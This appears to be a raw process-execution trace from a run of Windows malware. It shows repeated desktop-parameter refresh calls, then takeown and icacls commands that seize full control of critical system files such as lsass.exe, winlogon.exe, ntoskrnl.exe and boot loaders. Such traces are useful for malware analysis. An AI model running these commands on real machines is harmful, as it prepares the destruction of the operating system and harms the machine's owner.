"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\csrss.exe && icacls C:\Windows\System32\csrss.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\csrss.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\csrss.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\wininit.exe && icacls C:\Windows\System32\wininit.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\wininit.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\wininit.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\LogonUI.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\LogonUI.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\lsass.exe && icacls C:\Windows\System32\lsass.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\lsass.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\lsass.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\services.exe && icacls C:\Windows\System32\services.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\services.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\services.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\winlogon.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\winlogon.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.efi && icacls C:\Windows\System32\winload.efi /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\winload.efi
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\winload.efi /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\winload.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\winload.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\ntoskrnl.exe && icacls C:\Windows\System32\ntoskrnl.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\ntoskrnl.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\ntoskrnl.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\svchost.exe && icacls C:\Windows\System32\svchost.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\svchost.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\svchost.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\svchost.exe && icacls C:\Windows\SysWOW64\svchost.exe /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394ohci.sys && icacls C:\Windows\System32\drivers\1394ohci.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\3ware.sys && icacls C:\Windows\System32\drivers\3ware.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpi.sys && icacls C:\Windows\System32\drivers\acpi.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\SysWOW64\svchost.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AcpiDev.sys && icacls C:\Windows\System32\drivers\AcpiDev.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\SysWOW64\svchost.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpiex.sys && icacls C:\Windows\System32\drivers\acpiex.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\1394ohci.sys
C:\Windows\System32\cmd.exe
